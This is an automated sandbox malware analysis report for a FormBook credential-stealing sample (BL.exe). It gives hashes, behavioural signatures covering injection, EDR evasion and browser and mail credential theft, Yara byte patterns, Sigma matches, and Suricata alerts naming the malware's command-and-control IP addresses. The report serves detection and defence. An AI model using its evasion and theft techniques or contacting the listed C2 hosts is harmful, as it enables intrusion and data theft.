Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BL.exe

Overview

General Information

Sample name:BL.exe
Analysis ID:1538723
MD5:0084fa11e77425fd332e10928312f760
SHA1:33de149315ca65380f3f4f39ac3dcb85e36f588d
SHA256:0d76a185c479321a6eb599b67de8126eb81d5e3f8a1b9d93c0abaeeef9c89e40
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BL.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\BL.exe" MD5: 0084FA11E77425FD332E10928312F760)
    • svchost.exe (PID: 2084 cmdline: "C:\Users\user\Desktop\BL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OmmtmfniIsg.exe (PID: 5196 cmdline: "C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 3796 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • OmmtmfniIsg.exe (PID: 2656 cmdline: "C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BL.exe", CommandLine: "C:\Users\user\Desktop\BL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BL.exe", ParentImage: C:\Users\user\Desktop\BL.exe, ParentProcessId: 2308, ParentProcessName: BL.exe, ProcessCommandLine: "C:\Users\user\Desktop\BL.exe", ProcessId: 2084, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\BL.exe", CommandLine: "C:\Users\user\Desktop\BL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BL.exe", ParentImage: C:\Users\user\Desktop\BL.exe, ParentProcessId: 2308, ParentProcessName: BL.exe, ProcessCommandLine: "C:\Users\user\Desktop\BL.exe", ProcessId: 2084, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T17:24:45.946908+020028554651A Network Trojan was detected192.168.2.649930188.114.96.380TCP
            2024-10-21T17:25:14.287533+020028554651A Network Trojan was detected192.168.2.64999452.13.151.17980TCP
            2024-10-21T17:25:36.374955+020028554651A Network Trojan was detected192.168.2.650000103.106.67.11280TCP
            2024-10-21T17:25:49.591455+020028554651A Network Trojan was detected192.168.2.650004188.114.96.380TCP
            2024-10-21T17:26:04.855339+020028554651A Network Trojan was detected192.168.2.6500103.33.130.19080TCP
            2024-10-21T17:26:18.811054+020028554651A Network Trojan was detected192.168.2.657330217.70.184.5080TCP
            2024-10-21T17:26:32.177100+020028554651A Network Trojan was detected192.168.2.65733694.23.162.16380TCP
            2024-10-21T17:26:46.344977+020028554651A Network Trojan was detected192.168.2.657340103.224.182.24280TCP
            2024-10-21T17:26:59.734375+020028554651A Network Trojan was detected192.168.2.657344209.74.64.18780TCP
            2024-10-21T17:27:13.281250+020028554651A Network Trojan was detected192.168.2.65735065.21.196.9080TCP
            2024-10-21T17:27:26.618719+020028554651A Network Trojan was detected192.168.2.6573543.33.130.19080TCP
            2024-10-21T17:27:39.729473+020028554651A Network Trojan was detected192.168.2.6573583.33.130.19080TCP
            2024-10-21T17:27:54.172058+020028554651A Network Trojan was detected192.168.2.6573628.210.49.13980TCP
            2024-10-21T17:28:07.631770+020028554651A Network Trojan was detected192.168.2.65736894.23.162.16380TCP
            2024-10-21T17:28:25.263211+020028554651A Network Trojan was detected192.168.2.657369188.114.96.380TCP
            2024-10-21T17:28:38.488784+020028554651A Network Trojan was detected192.168.2.65737352.13.151.17980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T17:25:06.652560+020028554641A Network Trojan was detected192.168.2.64998852.13.151.17980TCP
            2024-10-21T17:25:09.193625+020028554641A Network Trojan was detected192.168.2.64999252.13.151.17980TCP
            2024-10-21T17:25:11.755140+020028554641A Network Trojan was detected192.168.2.64999352.13.151.17980TCP
            2024-10-21T17:25:28.750060+020028554641A Network Trojan was detected192.168.2.649995103.106.67.11280TCP
            2024-10-21T17:25:31.062664+020028554641A Network Trojan was detected192.168.2.649998103.106.67.11280TCP
            2024-10-21T17:25:33.625032+020028554641A Network Trojan was detected192.168.2.649999103.106.67.11280TCP
            2024-10-21T17:25:41.936045+020028554641A Network Trojan was detected192.168.2.650001188.114.96.380TCP
            2024-10-21T17:25:44.510712+020028554641A Network Trojan was detected192.168.2.650002188.114.96.380TCP
            2024-10-21T17:25:47.065312+020028554641A Network Trojan was detected192.168.2.650003188.114.96.380TCP
            2024-10-21T17:25:55.058197+020028554641A Network Trojan was detected192.168.2.6500053.33.130.19080TCP
            2024-10-21T17:25:57.616175+020028554641A Network Trojan was detected192.168.2.6500083.33.130.19080TCP
            2024-10-21T17:26:01.277397+020028554641A Network Trojan was detected192.168.2.6500093.33.130.19080TCP
            2024-10-21T17:26:11.219341+020028554641A Network Trojan was detected192.168.2.657327217.70.184.5080TCP
            2024-10-21T17:26:13.751070+020028554641A Network Trojan was detected192.168.2.657328217.70.184.5080TCP
            2024-10-21T17:26:16.328131+020028554641A Network Trojan was detected192.168.2.657329217.70.184.5080TCP
            2024-10-21T17:26:24.623720+020028554641A Network Trojan was detected192.168.2.65733394.23.162.16380TCP
            2024-10-21T17:26:27.162255+020028554641A Network Trojan was detected192.168.2.65733494.23.162.16380TCP
            2024-10-21T17:26:29.632875+020028554641A Network Trojan was detected192.168.2.65733594.23.162.16380TCP
            2024-10-21T17:26:38.750093+020028554641A Network Trojan was detected192.168.2.657337103.224.182.24280TCP
            2024-10-21T17:26:41.296892+020028554641A Network Trojan was detected192.168.2.657338103.224.182.24280TCP
            2024-10-21T17:26:43.843746+020028554641A Network Trojan was detected192.168.2.657339103.224.182.24280TCP
            2024-10-21T17:26:52.063051+020028554641A Network Trojan was detected192.168.2.657341209.74.64.18780TCP
            2024-10-21T17:26:54.627112+020028554641A Network Trojan was detected192.168.2.657342209.74.64.18780TCP
            2024-10-21T17:26:57.203134+020028554641A Network Trojan was detected192.168.2.657343209.74.64.18780TCP
            2024-10-21T17:27:05.640620+020028554641A Network Trojan was detected192.168.2.65734765.21.196.9080TCP
            2024-10-21T17:27:08.187589+020028554641A Network Trojan was detected192.168.2.65734865.21.196.9080TCP
            2024-10-21T17:27:10.688114+020028554641A Network Trojan was detected192.168.2.65734965.21.196.9080TCP
            2024-10-21T17:27:19.884813+020028554641A Network Trojan was detected192.168.2.6573513.33.130.19080TCP
            2024-10-21T17:27:21.496502+020028554641A Network Trojan was detected192.168.2.6573523.33.130.19080TCP
            2024-10-21T17:27:24.048800+020028554641A Network Trojan was detected192.168.2.6573533.33.130.19080TCP
            2024-10-21T17:27:33.029167+020028554641A Network Trojan was detected192.168.2.6573553.33.130.19080TCP
            2024-10-21T17:27:34.636976+020028554641A Network Trojan was detected192.168.2.6573563.33.130.19080TCP
            2024-10-21T17:27:37.183225+020028554641A Network Trojan was detected192.168.2.6573573.33.130.19080TCP
            2024-10-21T17:27:46.501070+020028554641A Network Trojan was detected192.168.2.6573598.210.49.13980TCP
            2024-10-21T17:27:49.030879+020028554641A Network Trojan was detected192.168.2.6573608.210.49.13980TCP
            2024-10-21T17:27:51.575501+020028554641A Network Trojan was detected192.168.2.6573618.210.49.13980TCP
            2024-10-21T17:28:00.061996+020028554641A Network Trojan was detected192.168.2.65736394.23.162.16380TCP
            2024-10-21T17:28:02.600944+020028554641A Network Trojan was detected192.168.2.65736694.23.162.16380TCP
            2024-10-21T17:28:05.080540+020028554641A Network Trojan was detected192.168.2.65736794.23.162.16380TCP
            2024-10-21T17:28:30.849501+020028554641A Network Trojan was detected192.168.2.65737052.13.151.17980TCP
            2024-10-21T17:28:33.397854+020028554641A Network Trojan was detected192.168.2.65737152.13.151.17980TCP
            2024-10-21T17:28:35.945799+020028554641A Network Trojan was detected192.168.2.65737252.13.151.17980TCP
            2024-10-21T17:28:52.296977+020028554641A Network Trojan was detected192.168.2.657374103.106.67.11280TCP
            2024-10-21T17:28:54.859422+020028554641A Network Trojan was detected192.168.2.657375103.106.67.11280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: BL.exeReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: BL.exeJoe Sandbox ML: detected
            Source: BL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OmmtmfniIsg.exe, 00000003.00000000.2294008987.000000000048E000.00000002.00000001.01000000.00000004.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452423712.000000000048E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044C310 FindFirstFileW,FindNextFileW,FindClose,4_2_0044C310
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor eax, eax4_2_00439B90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then mov ebx, 00000004h4_2_02AB04E1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49930 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57329 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57328 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57341 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50010 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57337 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57334 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57373 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57367 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57338 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57366 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57358 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57333 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57347 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57361 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57342 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57330 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57335 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57360 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57348 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57340 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57344 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57351 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57349 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57371 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57350 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57368 -> 94.23.162.163:80
